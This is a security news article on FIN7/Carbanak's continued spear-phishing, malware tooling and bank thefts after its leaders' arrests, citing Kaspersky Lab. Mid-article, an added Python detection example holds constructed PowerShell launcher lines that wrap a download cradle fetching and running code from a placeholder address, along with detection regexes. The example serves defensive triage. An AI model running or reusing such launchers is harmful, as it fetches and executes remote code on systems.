The criminal FIN7/Carbanak empire strikes back

The cybercriminal organization FIN7 is still active, despite the arrest of its key members.

FIN7's main activity is stealing companies' financial data (including payment card data) and gaining access to the financial records and workstations of finance-department employees in order to steal funds. The criminals even set up fake companies and hired pentesters, developers and analysts for their unlawful activity.

In 2018 three Ukrainian citizens described as key figures in FIN7 were arrested. Nevertheless, when Kaspersky Lab researchers analyzed malware operations that used the tactics, techniques and procedures (TTPs) typical of FIN7 attacks in 2017-2018, they concluded that the group continues its activity.

The researchers also found similarities with campaigns run by other groups that borrowed or copied TTPs from FIN7.

Over the last year the group continued attacking organizations with carefully crafted spear-phishing. Its distinctive trait is mastery of social engineering: in some cases the attackers exchanged correspondence with the victim for several weeks before sending the malicious email.

"The emails were efficient social-engineering attempts that appealed to a vast number of human emotions (fear, stress, anger, etc.) to elicit a response from their victims," the experts write.

One of the domains used in the 2018 phishing campaigns contained almost 130 user names, which led the Kaspersky Lab experts to conclude that the attackers had compromised about 130 companies.

The list of recent FIN7 victims includes banks in Europe and Central America. In the past year the group stole approximately €13 million from Bank of Valletta in Malta.

FIN7's arsenal includes the JavaScript backdoor GRIFFON and the Cobalt Strike and Meterpreter post-exploitation frameworks; in recent attacks the group also used the well-known PowerShell Empire toolkit.
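A practitioner reading about PowerShell Empire and Cobalt Strike usage will want a concrete detection hook. The block below is an added example, not code from the original article or from Kaspersky Lab: it scans constructed process-creation command lines (the kind of data Sysmon Event ID 1 or Windows 4688 provides) for the classic encoded-launcher pattern (`-NoP -NonI -W Hidden -Enc <base64>`) that PowerShell Empire stagers and many other PowerShell-based toolkits emit, decodes the UTF-16LE base64 payload, and looks for a download cradle inside it. The sample command lines, the `192.0.2.10` address and the scoring thresholds are assumptions for illustration, not FIN7 indicators.

```python
import base64
import re

# Constructed sample payload: what an encoded launcher typically wraps.
# PowerShell's -EncodedCommand expects base64 of a UTF-16LE string.
# The URL is a documentation address (RFC 5737), not a real indicator.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/launcher')"
    .encode("utf-16-le")
).decode()

# Constructed process-creation command lines (hypothetical, not real telemetry).
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoP -sta -NonI -W Hidden -Enc " + ENCODED_PAYLOAD,   # Empire-style launcher
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",  # benign admin script
    "powershell.exe -nop -w hidden -e " + ENCODED_PAYLOAD,                 # short-switch variant
    "cmd.exe /c dir",                                                      # unrelated
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand: -e, -ec, -en, -enc.
ENC_SWITCH = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_SWITCH = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden")
NONINTERACTIVE_SWITCH = re.compile(r"(?i)(?:^|\s)-noni")
NOPROFILE_SWITCH = re.compile(r"(?i)(?:^|\s)-nop")
DOWNLOAD_CRADLE = re.compile(r"(?i)Invoke-Expression|\bIEX\b|DownloadString|Net\.WebClient")


def decode_encoded_command(b64):
    """Decode a -EncodedCommand argument; return None if it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmd):
    """Return (findings, decoded_script) for one command line."""
    findings = []
    decoded = None
    m = ENC_SWITCH.search(cmd)
    if m:
        findings.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
    if HIDDEN_SWITCH.search(cmd):
        findings.append("hidden_window")
    if NONINTERACTIVE_SWITCH.search(cmd):
        findings.append("noninteractive")
    if NOPROFILE_SWITCH.search(cmd):
        findings.append("noprofile")
    if decoded and DOWNLOAD_CRADLE.search(decoded):
        findings.append("download_cradle")
    return findings, decoded


def is_suspicious(findings):
    """Assumed rule: an encoded command plus any stealth switch, or a decoded download cradle."""
    stealth = {"hidden_window", "noninteractive", "noprofile"}
    return "download_cradle" in findings or (
        "encoded_command" in findings and bool(stealth & set(findings))
    )


def triage(command_lines):
    """Return the indexes of command lines that trip the rule, with their findings."""
    hits = []
    for idx, cmd in enumerate(command_lines):
        findings, _ = score_command_line(cmd)
        if is_suspicious(findings):
            hits.append((idx, findings))
    return hits


if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_COMMAND_LINES):
        _, decoded = score_command_line(SAMPLE_COMMAND_LINES[idx])
        print(f"[{idx}] {findings}")
        print(f"     decoded: {decoded}")
```

Decoding the payload matters because `-EncodedCommand` is also used legitimately by management tooling; requiring either a stealth switch alongside it or a download cradle inside the decoded script keeps the rule from firing on every encoded invocation while still catching the short-switch variants (`-e`, `-w hidden`) that simple string matches on `-EncodedCommand` miss.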

In September 2018, right after the three group members were arrested, the experts discovered a new tool in the group's arsenal, the AveMaria botnet. AveMaria is a classic credential-stealing bot that harvests logins from browsers, messengers, email clients and so on; in addition, the malware can act as a keylogger. Since the beginning of the year, Kaspersky Lab experts have collected more than 1,300 AveMaria samples and extracted 130 C&C servers from them.

Conclusion from Kaspersky Lab

During 2018, Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader will have an impact on the group's operations. However, recent data seems to indicate that the attacks have continued without significant drawbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. It can be argued, with various levels of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

About Daniel Zimmermann

Daniel Zimmermann has been writing on security and malware subjects for many years and has been working in the security industry for over 10 years. Daniel was educated at the Saarland University in Saarbrücken, Germany and currently lives in New York.
